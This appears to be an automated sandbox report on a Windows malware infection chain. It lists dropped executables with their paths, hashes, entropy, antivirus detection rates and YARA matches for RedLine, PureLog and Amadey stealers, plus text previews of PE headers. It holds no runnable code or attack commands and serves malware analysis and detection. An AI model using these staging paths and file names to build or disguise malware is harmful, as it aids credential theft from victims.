                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'..............]...........@...........................^.......$...@.................................m0.......p.......................6].............................d6].................................@................... . .`..........................@....rsrc........p......................@....idata .....0......................@... ..*..@......................@...unpqzwpm..... D.....................@...glmqmaxs......].......$.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1166336
                                                                                                                                                                                                                                        Entropy (8bit):7.035559017923821
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8au+2+b+HdiJUX:mTvC/MTQYxsWR7au+2+b+HoJU
                                                                                                                                                                                                                                        MD5:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        SHA1:05DF05F574BC9122886743ED7BEB8887F2439237
                                                                                                                                                                                                                                        SHA-256:FB20F4C38C1F0D0D02422214FBB45DEED82E18F8B239A4383B50512431C56536
                                                                                                                                                                                                                                        SHA-512:E167682092AC7E9CCD5B75CF969E69178D90FA3778567DD7BB9A4AB998A71AA1A360BF55A52A0ED814E31260B9F21EFCE1C3F811908B26F29C8ED9C3D31C4BBD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...E.'f..........".................w.............@..........................0.......Y....@...@.......@.....................d...|....@..|a.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|a...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'..............]...........@...........................^.......$...@.................................m0.......p.......................6].............................d6].................................@................... . .`..........................@....rsrc........p......................@....idata .....0......................@... ..*..@......................@...unpqzwpm..... D.....................@...glmqmaxs......].......$.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000012001\amert.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1954304
                                                                                                                                                                                                                                        Entropy (8bit):7.949125787105512
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
                                                                                                                                                                                                                                        MD5:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
                                                                                                                                                                                                                                        SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
                                                                                                                                                                                                                                        SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@M...........@..........................pM..........@.................................Vp..j....`......................p.M............................. .M..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..+.........................@...nkxbjlfg.....p2.....................@...kzjaljwy.....0M.....................@....taggant.0...@M.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):329352
                                                                                                                                                                                                                                        Entropy (8bit):7.976897467568528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:DFZcMaQk5oqtag00+wX3bSJxuI2Hc8PlsLNuPhRF1Ym:DFZg5Ztj00+03mJxmc8PfPwm
                                                                                                                                                                                                                                        MD5:1C7D0F34BB1D85B5D2C01367CC8F62EF
                                                                                                                                                                                                                                        SHA1:33AEDADB5361F1646CFFD68791D72BA5F1424114
                                                                                                                                                                                                                                        SHA-256:E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C
                                                                                                                                                                                                                                        SHA-512:53BF85D2B004F69BBBF7B6DC78E5F021ABA71B6F814101C55D3BF76E6D058A973BC58270B6B621B2100C6E02D382F568D1E96024464E8EA81E6DB8CCD948679D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]h.f................................. ........@.. ....................... .......b....`.................................L...O.......:................N........................................................... ............... ..H............text........ ...................... ..`.rsrc...:...........................@..@.reloc..............................@..B........................H........................................................................0..........r...p.*..(....*..0..........rg..p.*..(....*...]*.0..\.........i.s........+...o.......X.... ....2..o.......o........8.........-X....d....(......(....&s..........o......o.....1......o...........o....r...po.....3....+.s.........o.......o.......o.......o.......o.......o.......Lo.......o.......o...........o........o.....Yo.........+........(...........o....+....2...X.. ....?........+A..... ........

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1793536
                                                                                                                                                                                                                                        Entropy (8bit):7.937675203377117
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
                                                                                                                                                                                                                                        MD5:85A15F080B09ACACE350AB30460C8996
                                                                                                                                                                                                                                        SHA1:3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
                                                                                                                                                                                                                                        SHA-256:3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
                                                                                                                                                                                                                                        SHA-512:ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................T..........Nr... ........@.. ....................................`..................................r..K.......D............................q............................................... ............... ..H............text...TR... ...T.................. ..`.rsrc...D............V..............@..@.reloc...............\..............@..B................0r......H........w..x...........$....&...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z*...(....*..0..$.........r...p......~....(....~....(......*...]*....0................s.........}.......i..... .......... ...............&........}....8......{.......d.....~....(................{....~....(....s.........o.......o.......o.......o.......o............{....o........:............s

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000149001\gold.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471152
                                                                                                                                                                                                                                        Entropy (8bit):7.708138361823541
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dxFiggCdJqiuBD2wxLdCGZeJqld72RJ7/SB0UkUmpG:588Iiu8eLYm0qld6kBRRqG
                                                                                                                                                                                                                                        MD5:B22521FB370921BB5D69BF8DEECCE59E
                                                                                                                                                                                                                                        SHA1:3D4486B206E8AAAC14A3CF201C5AC152A2A7D4EA
                                                                                                                                                                                                                                        SHA-256:B30D10E292F89F4D288839974F71F6B703D6D9A9AE698EA172A2B64364E77158
                                                                                                                                                                                                                                        SHA-512:1F7D64BA5266314ED18F577F0984706C21F4F48E8CDB069130E4435C2BCDF219F8DD27E4D3BF3A373F4DB4C01E30EFE8D7F4D87F4D8CBBBEAF9C7043F685994C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3u.%w..vw..vw..v.f.w{..v.f.w...v.f.wb..v...we..v...wc..v.f.w~..vw..v*..v...w:..v...wv..v...wv..vRichw..v................PE..L....&f...............'.....j.......J............@..........................@............@.................................,I..d.......................p&... .. ..../.............................../..@...............T............................text............................... ..`.rdata..............................@..@.data...T....`.......@..............@....reloc.. .... ......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):428544
                                                                                                                                                                                                                                        Entropy (8bit):6.494348537450964
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:5noAx+FnmuQhimtPURimLqevmipum+K4Y:5+FnmuGtpMLnLYY
                                                                                                                                                                                                                                        MD5:0099A99F5FFB3C3AE78AF0084136FAB3
                                                                                                                                                                                                                                        SHA1:0205A065728A9EC1133E8A372B1E3864DF776E8C
                                                                                                                                                                                                                                        SHA-256:919AE827FF59FCBE3DBAEA9E62855A4D27690818189F696CFB5916A88C823226
                                                                                                                                                                                                                                        SHA-512:5AC4F3265C7DD7D172284FB28C94F8FC6428C27853E70989F4EC4208F9897BE91720E8EEE1906D8E843AB05798F3279A12492A32E8A118F5621AC5E1BE2031B6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wD..3%..3%..3%..hM..=%..hM...%..hM.. %...H..!%...H..'%...H..F%..hM.."%..3%...%...K..2%...Ko.2%...K..2%..Rich3%..........................PE..L.... Me..........................................@.......................................@.................................D...x....p...........................L..P...8...................,...........@............................................text............................... ..`.rdata..............................@..@.data....F... ...4..................@....rsrc........p.......:..............@..@.reloc...L.......N...<..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000152001\jok.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):311296
                                                                                                                                                                                                                                        Entropy (8bit):5.0817932970004
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uq6EgY6i4rUjhYMLwPcologL/ejZWTACtAti0lcZqf7D34leqiOLibBOp:VqY6inwPDpKZWTA+AplcZqf7DIvL
                                                                                                                                                                                                                                        MD5:8510BCF5BC264C70180ABE78298E4D5B
                                                                                                                                                                                                                                        SHA1:2C3A2A85D129B0D750ED146D1D4E4D6274623E28
                                                                                                                                                                                                                                        SHA-256:096220045877E456EDFEA1ADCD5BF1EFD332665EF073C6D1E9474C84CA5433F6
                                                                                                                                                                                                                                        SHA-512:5FF0A47F9E14E22FC76D41910B2986605376605913173D8AD83D29D85EB79B679459E2723A6AD17BC3C3B8C9B359E2BE7348EE1C21FA2E8CEB7CC9220515258D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)v................0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162304
                                                                                                                                                                                                                                        Entropy (8bit):7.967195699444992
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:I1lmOH349skOxH49PsH+8KqnuHV7A/5S+c6wABA47PN/6wHFHJ:I1iekOxYlI+EuH2cvAe4BywlH
                                                                                                                                                                                                                                        MD5:586F7FECACD49ADAB650FAE36E2DB994
                                                                                                                                                                                                                                        SHA1:35D9FB512A8161CE867812633F0A43B042F9A5E6
                                                                                                                                                                                                                                        SHA-256:CF88D499C83DA613AD5CCD8805822901BDC3A12EB9B15804AEFF8C53DC05FC4E
                                                                                                                                                                                                                                        SHA-512:A44A2C99D18509681505CF70A251BAF2558030A8648D9C621ACC72FAFCB2F744E3EF664DFD0229BAF7C78FB72E69F5D644C755DED4060DCAFA7F711D70E94772
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........."...0..p...........4... ........@.. ....................................`.................................74..O....................................3..8............................................ ............... ..H............text...Po... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................k4......H........$.................................................................]*....0............i.s........+...o.......X.... ....2..o.......o........8.........-N....d....(......(....&s..........o.........o...........o....r...p(.....3....+.s....%.o....%.o....%.o....%.o....%.o....%.o....%.Lo....%.o....%.o....%.o....%o.....Yo.........+........(...........o....+....2...X.. ....?........+<. ....... ...............XX.. ....].......................X.. ....2........8.......+w..X ....].

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):871224
                                                                                                                                                                                                                                        Entropy (8bit):7.24103546516255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:EA+sYjJA6W7c5f6ydp1xlxrekNp6MARWch8kDSX+/Pw9Glg3z/F1EIJQWwChTc55:EAwOc5zTderJ/Pe0g3PaWvdc5Fqe
                                                                                                                                                                                                                                        MD5:021B6C96FE692E2BB8D4B0D02E9133B0
                                                                                                                                                                                                                                        SHA1:4FF05288024AEF4F289C22E4E6985F82C29E49D5
                                                                                                                                                                                                                                        SHA-256:FF477A862BD6E5ACEBE92887A6F221418DA1995DFB0ABED8527E21FDA9B8950B
                                                                                                                                                                                                                                        SHA-512:AFC29E105225F8F92C74B8EAD1DF10BEDBF6C795CAD72C53A6CE6237B71D3F73E346CD6E0116C6A380F7D07E79FA5007E63DF8DFE414D0C7816AAF5828CEA482
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....'f.........."...0..v............... ....@...... ....................................`.........................................................................X2............................................................................... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@........................................H.......X&...o......`.....................................................................................................................................................................................(....*:.(......}....*..(.....r...p.(....o....s ...}....*..*.(....{....*r(....%-.&.*{.....(....o"...**..R.(....*r(....%-.&.*{.....(....o(...*..(/...*Z..}......}......}....*6.{.....o....*6.{.....o....*6.{.....o....*r.(K.....}......}......}....*J.(.....~....}....*>...~.....("...*>...~....

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1000208001\install.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2470704
                                                                                                                                                                                                                                        Entropy (8bit):7.990554749886877
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:zgwRtL9Hckjh40JEvPXJnxNH0IHK61VW/2t+YKpEv6o2sUX7fEgvr:zgwRB98kj3JCPF71HKAV3+YAEaZ7fEgj
                                                                                                                                                                                                                                        MD5:55F780EA4DC5A5401B80915D69A55481
                                                                                                                                                                                                                                        SHA1:5EBDDE7F87637493DE0A5E7A4FFCD59839672C4E
                                                                                                                                                                                                                                        SHA-256:C3014A898F63FAB694A759D56BB0B3C979484EEDD32708E1467E566B4F3DFA70
                                                                                                                                                                                                                                        SHA-512:680CA9D6F5AA4D53E7083858BFD4D3FC71F567993968EDC83DDF262E15B2ED06F07C5A4C47E65F4874074213ADF3CD978B8EAA658563694CAF013FB126948697
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......P.....................\....../.............@..........................P......3-......................................t........0..................................................................................l............................text.............................. ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc........0......................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.c...P....Y.nj'.S....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.f...Y.r8..j...t.A...t$..D....V....s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.d.....3.9F.Y~.9F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1954304
                                                                                                                                                                                                                                        Entropy (8bit):7.949125787105512
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
                                                                                                                                                                                                                                        MD5:3AB592D71455D47170AB784430AE8102
                                                                                                                                                                                                                                        SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
                                                                                                                                                                                                                                        SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
                                                                                                                                                                                                                                        SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@M...........@..........................pM..........@.................................Vp..j....`......................p.M............................. .M..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..+.........................@...nkxbjlfg.....p2.....................@...kzjaljwy.....0M.....................@....taggant.0...@M.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1910784
                                                                                                                                                                                                                                        Entropy (8bit):7.944555942207053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:13/bnTrRlJqN+zVjKQVO3LNjmd6P0uqVs:1jnTrrJqY5ORjSieG
                                                                                                                                                                                                                                        MD5:169D873778A229BCB4F010F87930CB28
                                                                                                                                                                                                                                        SHA1:15D928181A3ABE9FC84D21454246676BAAD444A8
                                                                                                                                                                                                                                        SHA-256:F2F647BA7CA2104C8D5AA7130502EB7A48CE1AE629EE33ABF1EFCC07F172C449
                                                                                                                                                                                                                                        SHA-512:42630F7E98502C97806A4F241598DBA61298D1874BFFC7BAF1BEA34C3950861A182DAF6798F4834B4D2865238569379A3BFA796DEE953224FC29E712831170C4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L...yO&f..............................K...........@.......................... L...........@.................................V...j....p......................\.K...............................K..................................................... . .`..........................@....rsrc........p......................@....idata ............................@... .@+.........................@...wqkjverv......1.....................@...wmthiooa......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe:Zone.Identifier

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):2940
                                                                                                                                                                                                                                        Entropy (8bit):7.74899741479457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:9oaHlnPtLeRIT757mXpkjQODXEWjuZ/4BSqSg6qC5ve8RQn3KJ6gkOOyI8wCw:PhKY7mXMl1LBBSgvgve8RQ3KJFSP
                                                                                                                                                                                                                                        MD5:9B4A41DB9CFEF2A60F503064512BBC64
                                                                                                                                                                                                                                        SHA1:0FA674C776BC8DF35071B455F3AE1027FEA44DCB
                                                                                                                                                                                                                                        SHA-256:658138116083EDBE5D426C5A239FA78897AFF59A5B41EA8CA191C06EEDF5359B
                                                                                                                                                                                                                                        SHA-512:D04A82620D9AF9FA5774FD7FB046C567713FFB1888B5B3C0EF8619E094967F62351288D1C82208FF68E67283108B518659129244C66D6AFC504532DBB2ABB30D
                                                                                                                                                                                                                                        Malicious:true
